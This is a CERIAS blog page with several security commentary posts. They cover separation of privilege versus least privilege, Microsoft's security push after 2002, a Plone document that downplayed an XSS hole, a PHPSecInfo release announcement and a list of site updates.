The Center for Education and Research in Information Assurance and Security (CERIAS)

The Center for Education and Research in
Information Assurance and Security (CERIAS)

CERIAS Blog

Page Content

Confusion of Separation of Privilege and Least Privilege

Share:

Least privilege is the idea of giving a subject or process only the privileges it needs to complete a task.  Compartmentalization is a technique to separate code into parts on which least privilege can be applied, so that if one part is compromised, the attacker does not gain full access.  Why does this get confused all the time with separation of privilege?  Separation of privilege is breaking up a *single* privilege amongst multiple, independent components or people, so that multiple agreement or collusion is necessary to perform an action (e.g., dual signature checks).  So, if an authentication system has various biometric components, a component that evaluates a token, and another component that evaluates some knowledge or capability, and all have to agree for authentication to occur, then that is separation of privilege.  It is essentially an “AND” logical operation;  in its simplest form, a system would check several conditions before granting approval for an operation.  Bishop uses the example of “su” or “sudo”;  a user (or attacker of a compromised process) needs to know the appropriate password, and the user needs to be in a special group.  A related, but not identical concept, is that of majority voting systems.  Redundant systems have to agree, hopefully outvoting a defective system.  If there was no voting, i.e., if all of the systems always had to agree, it would be separation of privilege.  OpenSSH’s UsePrivilegeSeparation option is *not* an implementation of privilege separation by that definition, it simply runs compartmentalized code using least privilege on each compartment.

What security push?

Share:

[tags]Vista, Windows, security,flaws,Microsoft[/tags]

Update: additions added 4/19 and 4/24, at the end.

Back in 2002, Microsoft performed a “security standdown” that Bill Gates publicly stated cost the company over $100 million.  That extreme measure was taken because of numerous security flaws popping up in Microsoft products, steadily chipping away at MS’s reputation, customer safety, and internal resources.  (I was told by one MS staffer that response to major security flaws often cost close to $1 million each for staff time, product changes, customer response, etc.  I don’t know if that is true, but the reality certainly was/is a substantial number.)

Without a doubt, people inside Microsoft took the issue seriously.  They put all their personnel through a security course, invested heavily in new testing technologies, and even went so far as to convene an advisory board of outside experts (the TCAAB)—including some who have not always been favorably disposed towards MS security efforts.  Security of the Microsoft code base suddenly became a Very Big Deal.

Fast forward 5 years: When Vista was released a few months ago, we saw lots of announcements that it was the most secure version of Windows ever, but that metric was not otherwise qualified; a cynic might comment that such an achievement would not be difficult.  The user population has become habituated to the monthly release of security patches for existing products, with the occasional emergency patch.  Bundling all the patches together undoubtedly helps reduce the overhead in producing them, but also serves to obscure how many different flaws are contained inside each patch set.  The number of flaws maybe hasn’t really decreased all that much from years ago.

Meanwhile, reports from inside MS indicate that there was no comprehensive testing of personnel to see how the security training worked and no follow-on training.  The code base for new products has continued to grow, thus opening new possibilities for flaws and misconfiguration.  The academic advisory board may still exist, but I can’t find a recent mention of it on the Microsoft web pages, and some of the people I know who were on it (myself included) were dismissed over a year ago.  The external research program at MSR that connected with academic institutions doing information security research seems to have largely evaporated—the WWW page for the effort lists John Spencer as contact, and he retired from Microsoft last year.  The upcoming Microsoft Research Faculty Summit has 9 research tracks, and none of them are in security.

Microsoft seems to project the attitude that they have solved the security problem.

If that’s so, why are we still seeing significant security flaws appear that not only affect their old software, but their new software written under the new, extra special security regime, such as Vista and Longhorn?  Examples such as the ANI flaw and the recent DNS flaw are both glaring examples of major problems that shouldn’t have been in the current code: the ANI flaw is very similar to a years-old flaw that was already known inside Microsoft, and the DNS flaw is another buffer overflow!!  There are even reports that there may be dozens (or hundreds) of patches awaiting distribution for Vista.

Undoubtedly, the $100 million spent back in 2002 was worth something—the code quality has definitely improved.  There is greater awareness inside Microsoft about security and privacy issues.  I also know for a fact that there are a lot of bright, talented and very motivated people inside Microsoft who care about these issues.  But questions remain: did Microsoft get its money’s worth?  Did it invest wisely and if so, why are we still seeing so many (and so many silly) security flaws?  Why does it seem that security is no longer a priority?  What does that portend for Vista, Longhorn, and Office 2007?  (And if you read the “standdown” article, one wonders also about Mr. Nash’s posterior. grin )

I have great respect for many of the things Microsoft has done, and admiration for many of the people who work there.  I simply wish they had some upper management who would realize that security (and privacy) are ongoing process needs, not one-time problems to overcome with a “campaign.”

What do you think?

[posted with ecto]

Update 4/19: The TCAAB does still continue to exist, apparently, but with a greater focus on privacy issues than security.  I do not know who the current members might be.

Update 4/24: I have heard (informally) from someone inside Microsoft in informal response to this post.  He pointed out several issues that I think are valid and deserve airing here;

  1. Security training of personnel is on-going.  It still is unclear to me whether they are employing good educational methods, including follow-up testing, to optimize their instruction.
  2. The TCABB does indeed continue (and was meeting when I made the original post!).  It has undergone some changes since it was announced, but is largely the same as when it was formed.  What they are doing, and what effect they are having (if any), is unclear.
  3. Microsoft’s patch process is much smoother now, and bundled patches are easier to apply than lots of individual ones.  (However, there are still a lot of patches for things that shouldn’t be in the code.)
  4. The loss of outreach to academia by MSR does not imply they aren’t still doing research in security issues.

Many of my questions still remain unanswered, including Mr. Nash’s condition….

Do Open Source Devs Get Web App Security?  Does Anybody?

Share:

Note: I’ve updated this article after getting some feedback from Alexander Limi.

A colleague of mine who is dealing with Plone, a CMS system built atop Zope, pointed me to a rather disturbing document in the Plone Documentation system, one that I feel is indicative of a much larger problem in the web app dev community.

The first describes a hole (subsequently patched) in Plone that allowed users to upload arbitrary JavaScript.  Apparently no input or output filtering was being done.  Certainly anyone familiar with XSS attacks can see the potential for stealing cookie data, but the article seems to imply this is simply a spam issue:

Clean up link spam

Is this a security hole?
No. This is somebody logging in to your site (if you allow them to create their own users) and adding content that can redirect people to a different web site. Your server, site and content security is not compromised in any way. It’s just a slightly more sophisticated version of comment spam. If you open up your site to untrusted users, there will always be a certain risk that people add content that is not approved. It’s annoying, but it’s not a security hole.

Well, yes, actually, it is a security hole.  If one can place JavaScript on your site that redirects the user to another page, they can certainly place JavaScript on your site that grabs a user’s cookie data and redirects that to another site.  Whether or not they’ll get something useful from the data varies from app to app, of course. What’s worrisome is that it appears as if one of Plone’s founders (the byline on this document is for Alexander Limi, whose user page describes him as “one of Plone’s original founders.”) doesn’t seem to think this is a security issue. After getting feedback from Alexander Limi, it seems clear that he does understand the user-level security implications of the vulnerability, but was trying to make the distinction that there was no security risk to the Plone site itself.  Still, the language of the document is (unintentionally) misleading, and it’s very reminiscent of the kinds of misunderstandings and excuses I see all the time in open-source web app development.

The point here is (believe it or not) not to pick on Plone.  This is a problem prevalent in most open source development (and in closed source dev, from my experience).  People who simply shouldn’t be doing coding are doing the coding—and the implementation and maintenance.

Let’s be blunt: A web developer is not qualified to do the job if he or she does not have a good understanding of web application security concepts and techniques.  Leaders of development teams must stop allowing developers who are weak on security techniques to contribute to their products, and managers need to stop hiring candidates who do not demonstrate a solid secure programming background.  If they continue to do so, they demonstrate a lack of concern for the safety of their customers.

Educational initiatives must be stepped up to address this, both on the traditional academic level and in continuing education/training programs.  Students in web development curriculums at the undergrad level need to be taught the importance of security and effective secure programming techniques.  Developers in the workforce today need to have access to materials and programs that will do the same.  And the managerial level needs to be brought up to speed on what to look for in the developers they hire, so that under-qualifed and unqualified developers are no longer the norm on most web dev teams.

 

PHPSecInfo v0.2 now available

Share:

PHPSecInfo Screenshot PHPSecInfo Screenshot

The newest version of PHPSecInfo, version 0.2, is now available.  Here are the major changes:

  • Added link to “more info” in output.  These lead to pages on the phpsec.org site giving more details on the test and what to do if you have a problem
  • Modified CSS to improve readability and avoid license issue with PHP (the old CSS was derived from the output of phpinfo())
  • New test: PhpSecInfo_Test_Session_Save_Path
  • Added display of “current” and “recommended” settings in test result output
  • Various minor changes and bug fixes; see the CHANGELOG for details

-Download now

-Join the mailing list

 

What’s New at CERIAS

Share:

I haven’t posted an update lately of new content on our site, so here’s a bit of a make-up post:

CERIAS Reports & Papers

CERIAS Hotlist

CERIAS News

CERIAS Security Seminar Podcast